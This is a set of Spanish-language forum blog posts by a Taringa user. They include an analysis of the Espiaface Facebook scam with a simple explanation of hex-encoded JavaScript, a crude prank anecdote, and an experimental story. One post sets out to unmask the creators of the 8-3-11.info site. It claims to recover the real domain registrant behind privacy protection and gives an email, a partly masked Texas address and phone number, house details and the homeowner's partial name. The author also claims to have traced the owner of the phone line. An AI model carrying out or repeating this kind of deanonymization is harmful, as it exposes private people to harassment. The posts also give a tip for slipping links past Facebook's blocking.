Los caraduras lo promocionan con "Incluye toolbar de terceros GRATIS"... Pero por suerte tienen suficiente ética, te lo podés sacar de encima si lo desinstalás desde "Agregar o Quitar Programas" del Panel de Control. Un truquito para ahorrar tiempo: Vayan a Ejecutar (para ahorrar más tiiempo aún: Tecla Windows + R) y escriban AppWiz.cpl (y presionen Enter). Tadá, "Agregar o Quitar Programas" en 1 segundo. PD 2: Hay, sin embargo, un método para saber cuántos entraron a tu perfil (tiempo, fecha, IP, y todo), PERO no podés saber qué usuario de Facebook fue. Jajaja PD 3: Por si no lo vieron todavía, entren acá para ver este cortometraje re loco para relajarte de la calentura de Espiaface. Aguanten hasta el final que es re loco. Respondiendo a las preguntas que me llega por MP: 1) ¿Cómo sé todo esto? Todo esto lo averigué entrando al sitio de espiaface, viendo su código y viendo cómo se comporta el sitio. Está todo a la vista. Busqué algo por internet para ver si alguien había investigado más profundamente, pero todo era incompleto, algunos se rascaban la cabeza públicamente al no comprender el fin de esta ingeniería social masiva. A los bloggers más serios, les envié un mail compartiendo esto. Luego usé proxies de diferentes países para ver cómo se comportaba el sitio según el área geográfica del IP (acá es donde todos hacían agua) Sobre las ganancias, eso yo tengo bastante experiencia con el marketing online, de ahí mi conocimiento sobre el "modelo de negocio" de las comisiones por lead (traer información de potenciales clientes) o conversión (ventas). El boludo de Espiaface podría haber generado mucho más guita si se hubiese avivado que sus auspiciantes no tienen cobertura internacional. Por ejemplo, el auspiciante de Enterfactory TIENE productos para Argentina y Chile (esta empresa afana por telefonia celular y tiene convenios con Movistar y Claro en toda latinoamerica) pero sólo tiene publicado para el producto Mexicano. Por esta razón se perdió miles y miles de dólares de oportunidad. 2) Cómo sé programación Esta es la parte que les va a confundir a varios. Yo no sé programar, pero sé interpretar el código. El lenguaje de programación es como aprender una lengua. Si sabés español, podés llegar a entender portugues aunque no lo sepas hablar. Algo similar pasa con los lenguajes de programación. Si entendés el tema de las estructuras gramaticales, la sintaxis, artículos, pronombres, etc... podés entender cómo el chino está organizado y entenderlo aunque no lo hables. Análogo a esto, si aprendés a programar un lenguaje, aprender el siguiente te va a resultar mucho más sencillo. Si en lugar de enfocarte en un lenguaje, te enfocás a entender a cómo las lenguas están organizadas gramaticalmente, sintácticamente y su cultura, vas a poder entender cualquier lengua. (sea de computadoras o humanas) 3) Si no se programación, ¿cómo "desofusqué" el código? Muy buena pregunta. La técnica de ofuscación usada en este caso es muy sencillo, y es un truco viejisimo. Un caracter tiene un valor ASCII, el cual puede ser traducido a cualquier otro número que puede ser interpretado por la computadora, pero que nosotros no podemos entender un carajo. Por ejemplo, si me pregunás cuántos años tengo, me dirías que se dice "preguntás" y que me comí la "t", la T de Troll de mierda. Empecemos de nuevo, si me pregunTaras qué edad tengo, en lugar de decirte mi edad en números decimales como toda gente normal, te puedo devolver la trolleada diciéndote que yo tengo (log(10^(6*7)+cos(90))+10-3*3+8+20-18-(La edad de Jesús al morir, según la tradición católica)-75+80+5+3+7+(raiz cuadrada de 64)+5*5+14+6-41)/2 años. Ahí tenés mi edad. Si estás cursando la secundaria, ves eso y te cagás de risa (que por cierto, esa cuenta calcula mi edad real). Sabés que es una pavada ridículamente básica, sólo que es un dolor de huevos resolverlo. Algo parecido sucede con la ofuscación en este Javascript: Es una pavada. Si prestan atención al estilo de ofuscación, podemos sonreir antes de desofuscarlo: x4Ex61x6Ex6Fx70x65x6Ex65 es obvio, ya desde el formato mismo, que la codificación es una simple traducción de valores ASCII a hexadecimal. Des-ofuscando: 4E (hexadecimal) = 78 (decimal) = N (ASCII valor 78, prueben ALT+78) 61=097=a 6E=110=n 6F=111=o 70=112=p 65=101=e 6E=110=n 65=101=e Pueden ingresar a beautify para la deofuscación simple y formateo automático del código: http://jsbeautifier.org/ En el caso de que la ofuscación sea muy sofisticada, para análisis más profundo uso el sitio: http://jsunpack.jeek.org/dec/go?report=9d6d18553de1f44ee0d4dfe32e9b37734c11b3e2 (puede resultar confuso, pero es muy útil) 4) Dios santo... REITERO: EL ESPIAFACE NO SE DESINSTALA PORQUE NO SE INSTALA NADA. I REITERATE: THE ESPIAFACE DOESN'T NEED TO BE UNINSTALLED BECAUSE NOTHING IS INSTALLED IN THE FIRST PLACE! Я повторяю: ESPIAFACE не может быть удален, потому что ничто не установлен! Pero qué pasa que no me entienden, ¿estoy hablando en ruso? 5) El dueño del dominio Entraentuperfil.com Gabriel Mellace me envió un MP: Ni sé por qué tengo que especificar esto, desde el título de este post dice claramente que es sobre ESPIAFACE.COM y sólo sobre ESPIAFACE.COM. El pobre de Gabriel Mellace parece haber quedado pegado injustamente y no tiene nada que ver. Dejen de llamarlo y de amenazarlo. Supongo que esto resuelve todas las preguntas Si Facebook les bloquea el link hacia este post Copien y peguen este link para postearlo en los muros: http://goo.gl/UgTFk Una vez que Facebook lo acepte, cambiale el título, clickeando sobre el "Permanently moved" Y de paso contáctense con Facebook para avisarles que el link no es ofensivo.

Opa, jaja cayeron todos, ¿eh? No, este no es el cuarto capítulo Pero sí les prometo el cuarto para este o el siguiente fin de semana, no más tarde que eso. Mientras tanto, me gustaría comentar algo que me sucedió hace unos días. Me meto en el baño público y me dirijo a uno de los cinco mingitorios disponibles. Me paro a la distancia correcta, me posiciono y me dispongo a contemplar mi monumento a la virilidad antes del glorioso momento de desahogo peneano. En ese instante, mientras apuntaba el chorro de meo a las pelotitas de naftalina, entra un tipo al baño. Escucho los pasos detrás mío, pero en lugar de pararse en uno de los mingitorios libres, el tipo desaparece. Eso es algo que jamás entendí: ¿por qué carajo se mete a los inodoros en vez de mear como un hombre en un mingitorio como Dios manda? Existe una y sólo una razón por la que alguien desearía esconderse detrás de una puerta, y ahí se me ocurrió un plan diabólico: Karlos Arguiñano dijo:Receta de Plan Diabólico (Rinde para 5 personas o más. Dificultad: simple) Ingredientes: * 1 cerebro * 2 cuerdas Vocales * 2 manos (muñones, también sirven) * 1 oreja grande o 2 chicas * Sal a gusto (para la herida en el autoestima, juajua) Procedimiento: 1) No importa dónde estés parado. 2) Poné las dos manos al lado de tu boca 3) Decí cagándote de risa: "Uuh, mirá boludo la tiene re chiquita, JAAJAA!" No importa que no se pueda ver, ni donde esté parado, ni si cerró la puerta con llave; en el mismo instante que escuche eso, el tipo que está meando va a pensar que están hablando de él. Si hay cinco tipos meando cada uno encerrado en su propio cubículo, cada uno va a pensar que están hablando de él. Y si susurrás en vez de gritar, tiene más efecto todavía. Se escuchaba al chorrito de mi futura víctima bien tranquilo apuntado hacia el agua del inodoro. Al ejecutar mi plan al chorro le agarró epilepsia. Moraleja: Los inodoros son para cagar, cagón Una yapa por el retraso, les paso un corto independiente de un amigo re loco (Veanlo todo que el final es un cago de risa) Hasta el finde que viene!

Actualizacion I: Becky está en un estado emocional muy frágil, por favor no la jodan por favor Actualizacion II: Entrevistado por Teby Futbol: http://tebyfutbol.blogspot.com/2011/07/la-investigacion-hoy-en-teby-futbol.html Actualizacion III: ¡Sali en las noticias en Yahoo!! jojojo: http://es.finance.yahoo.com/noticias/Desvelado-misterio-web-8-3-11-dandoguerrilla-3728966000.html?x=0 Buenas, les vengo a traer una nueva investigacion al mejor estilo de nanopene. La realidad de la milanesa está aquí. Si investigamos el dominio de 8-3-11.info, ellos han protegido la privacidad del registrante: Domain ID:D38516641-LRMS Domain Name:8-3-11.INFO Created On:21-Jun-2011 02:17:39 UTC Last Updated On:21-Jun-2011 02:17:39 UTC Expiration Date:21-Jun-2012 02:17:39 UTC Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS) Status:CLIENT DELETE PROHIBITED Status:CLIENT RENEW PROHIBITED Status:CLIENT TRANSFER PROHIBITED Status:CLIENT UPDATE PROHIBITED Status:TRANSFER PROHIBITED Registrant ID:CR86237525 Registrant Name:Registration Private Registrant Organization:Domains by Proxy, Inc. Registrant Street1:DomainsByProxy.com Registrant Street2:15111 N. Hayden Rd., Ste 160, PMB 353 Registrant Street3: Registrant City:Scottsdale Registrant State/Province:Arizona Registrant Postal Code:85260 Registrant Country:US Registrant Phone:+1.4806242599 Registrant Phone Ext.: Registrant FAX:+1.4806242598 Registrant FAX Ext.: Registrant Email: 8-3-11.info@domainsbyproxy.com Los que tienen algo de experiencia con whois sabrán que con un poco de magia se puede obtener los datos del registrante original, si han tenido un descuido. A continuación los datos del registrante real: Status:TRANSFER PROHIBITED Registrant ID:CR86237525 Registrant Name:Sam Eightthreeeleven Registrant Organization:8-3-11 Registrant Street1:***** Flowerwood Registrant Street2: Registrant Street3: Registrant City:Houston Registrant State/Province:Texas Registrant Postal Code:77062 Registrant Country:US Registrant Phone:+1.832633**** Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:8slash3slash11@gmail.com aclaracion dijo:Según los registros de Whois, los primeros dos días de existencia, Junio 22 y Junio 23, el registro era público (mostraba la información con la dirección de Texas). Desde el Junio 24, los de 8-3-11 usaron los servicios de privacidad de whois de GoDaddy (Domains by Proxy, Inc.) y desde entonces aparece la dirección de GoDaddy (dirección de Arizona). GoDaddy es una empresa de hosting muy popular en Estados Unidos y también es un registrar autorizado (como nic.ar). Todos los que decían que los autores eran de Arizona, estaban disparando cohetes para cualquier lado. Cualquiera que hubiera hecho la petición de Whois el junio 22 o junio 23 hubiera obtenido la información de Texas y así fue cómo algunos terminaron posteando en foros y en 4Chan. Pero nadie le daba la relevancia que debería tener. La clave no es la dirección. Uno podría poner cualquier direccion falsa al registrarlo. Pero que la direccion exista es +1 confianza. Y que el codigo postal sea el correcto +1. Pero la clave es el telefono: esta registrado en la misma ciudad de la casa: Houston, Texas +1 Pero aún no me satisfacía, así que termine averiguando a nombre de quién estaba registrada la línea del celular... y terminó siendo el proprietario de la casa. Ahora, esto sí es una evidencia fuerte. Y esto es lo que no van a encontrar en ninguna otra página. Hasta acá es lo que algunos en internet ya habían averiguado (aunque por lo visto, no sabían interpretar estas diferencias) Aunque a primera vista parecen datos falsos, indagando un poco más profundamente podemos descubrir que en realidad son datos verdaderos. Los datos relevantes son los siguientes Domicilio: ***** Flowerwood Codigo Postal: 77062 Estado/Provincia: Texas Telefono Registrado: +1.832633**** Curioseando un poco más puedo comprobar de que realmente existe ***** Flowerwood en Texas y el código postal es el correcto… y no me detuve ahí. Es una casa que fue construida en 1978 con 5 habitaciones, 3 baños, el lote mide 847.27 m2, vale alrededor de $220.200. Fue adquirida en el 06/20/2003 por ROBERT GUY P******. Averigué que el teléfono usado para registrar el dominio es un teléfono celular con una línea de Sprint (Un proveedor de telefonía celular CDMA en Estados Unidos). Usando un poco de magia también rastreé el nombre del dueño de la línea del celular... nanopene dijo:Para respetar con el protocolo (hay informacion privada), tuve que cortar este post por la mitad. Cliqueen acá para continuar leyendo el resto! nanopene dijo:Si ya lo leiste completo, leete la segunda parte.... NanoInvestigacion II: Reloaded

CreativeCommons dijo:Este contenido es de creación original por el usuario nanopene de Taringa. Esta obra se encuentra bajo licencia Creative Commons (CC BY-NC-ND 3.0) El resto de los derechos reservados. El Pibe Que No Sabía Trollear, ¿Problem? poooronoaanponpeeanae Creado por Nanopene de taringa - Si estás leyendo esto es porque está copiado. Sorete. -PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO- ¿Che,ste sentísebien?... ¿Problem? Sosbmiamejorsamigo... ¿Problem? Uyaquétlindoidía... ¿Problem? Nena,stesamo... ¿Problem? Tengosun... ¿Problem? Creado por Nanopene de taringa - Si estás leyendo esto es porque está copiado Clotildo reflexionó y decidió ir al psicólogo para tratar sus dificultades. -PLAGIADO-PLAGIADO::AUTOR ORIGINAL: NANOPENE de TARINGA:: PLAGIADO-PLAGIADO ─Clotildo,o¿cómo te sentis? ─Estoyoreocaliente. ─¿Y...? ─Y... (?) Y andate a la lavarte el orto plagiador de mierda, vos y tu manga de perdedores en los clones de taringa. ¿P R O B L E M? ─Aaver,aprobemoscdemnuevo, ¿odiássa alguien de tu clase? ─Si,salsreverendoshijosdesputasdesDanielsGimenezsdels3erosA,sesesgordosinsolentesunsdíaslesvvoysa... ─¡Perfecto!,simaginatesquessoysDaniel,svengoscaminandoshaciasvos...s─elspsicólogossesparasyslosempujasdesafiantesasClotildo. ─¡Corretesdesmiscamino!s─reaccionasClotildosperturbadosysensimismadosenssusrol. ─¡Vossfijatesbiensporsdondescaminás!s─lesrespondeselspsicólogo. ─¡¡¡Yoscaminosporsdondesquierosyscuandosquiero...smesentendés...!!!!s¿Mesentendés...?s─gritasClotildo. Elspsicólogoslosobservasenssilenciosmientrasshacesunsademánscircularsconslasmano,sentreabriendosinconscientementesloss labiossdeseandosquesprosiga. ─... (?) -PLAGIADO-PLAGIADO::AUTOR ORIGINAL: NANOPENE de TARINGA:: PLAGIADO-PLAGIADO Se oye un suspiro profundo y Clotildo le imita pensando que es lo políticamente correcto. El silencio se apoderó de la sala sigilosamente sin que ninguno de los dos se diera cuenta de su arribo. ─Oigacdoctor,custedctienecunchijo,c¿no?c─rompiócelchielocClotildocsincestarcconscientecdechabercquebradocelcfinoccristal. ─Sí,csíc─relatacalegrecrecordandocacsucpreciosocnene─ctengocun...c─decrepenteclacvozcdecClotildoclecinterrumpe. ─¿Problem? -PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO-PLAGIADO- Un año más tarde de terapia psicoanalítica, se reencuentran en la calle. -PLAGIADO-PLAGIADO::AUTOR ORIGINAL: NANOPENE de TARINGA:: PLAGIADO-PLAGIADO ─Clotildo,e¡hola!e─leesaludaeeledoctoreaepuntoedeeingresareenesueautoerojo,equieneibaerumboeaesueconsultorio. ─¡Holaedoctor!e─leesaludaeClotildoeaepuntoedeeingresaretambiéneaesueautoeazul,econeelecualeseedirigíaehaciaeele supermercado. ─¿Comoeestas?e─leepreguntaeeledoctoregenuinamenteealegreedeeverlo ─Muyebien,egracias.e¿Cómoeestaesuefamilia?e─aeClotildoeleetiemblaelaenarizeunesegundo. ─Muyebien,egraciaseporepreguntar...e─leerespondeeeledoctor. ─¿SineProblemas?e─diceeClotildoesinepreámbuloseyesinehumor. ─Este...esi,esineproblemse─respondeedistraidoeeledoctor,eahoraeunepocoeimpaciente ─¿Problem?e─pronunciaeClotildoeconeunaelentitudequeeleeconferíaeciertaemisticidadeaelaepalabra. ─No,enoeprobleme─respondióeeledoctor. ─Ohegood,eI'megladetoehearethat.eSeeeyouearound,ethen.e─vocalizóeClotildoesineentendereunepepinoeloequeesuselabiose sonorizaban. eSuefrenteeceñidaereflejabaesueextrañeza. ─Aroundewhere?e─preguntóeeledoctor. ─HaeHa,eyoueareesucheaesillyegoose...e─leerespondióeClotildo. ─Allerightethen,egoodetoeseeeyouedoctore─leesaludaeeledoctor. ─GoodetoeseeeyouetooeClotildoe─leerespondeeelesaludoeClotildo. -PLAGIADO-PLAGIADO::AUTOR ORIGINAL: NANOPENE de TARINGA:: PLAGIADO-PLAGIADO Clotildoeseesubeeaesueautoerojo,ealegreedeehaberseelibradoedelepesadoedeeClotildo,esuesiluetaeseepierdeeeneelehorizontee soleadoerumboehaciaeeleconsultorio.eConeunebreveeresplandoreámbareeleautoerojoeseedespidióeporeúltimaevezedeenuestrae presenciaevisual. ALsuLvez,LelLdoctorLseLsubeLaLsuLautoLazulLrumboLalLsupermercado,LalegreLdeLhaberseLlibradoLdelLdoctor.LElLdoctorL arrancaLsuLautoLyLseLpierdeLenLelLhorizonteLdesvaneciéndoseLlentamenteLenLlaLbruma.LEnLunosLinstantesLantesLdeLqueLlaL sombraLseLfusionaseLconLelLfondoLgrisáceo,LseLescuchanLecosLdesdeLlasLneblinasLresonando:L"¿Problem?" - - - Dedicado a Дании́л Хармс (Daniil Kharms) Comenten sobre lo que creen interpretar del cuento: + ¿Cuál es mi intención al escribirla? + ¿Qué creen que sucede en la historia? + ¿Quién es Clotildo? + ¿A quién le dedico la obra? + ¿Cuál es el "texto real" del cuento?, ¿por qué creés que está escrito así? Sobre el Cap 4 El capítulo cuatro... llegará... muy pronto... no tan pronto como desearías... no menos pronto de lo que desearía. Así que estamos a mano ¿Problem?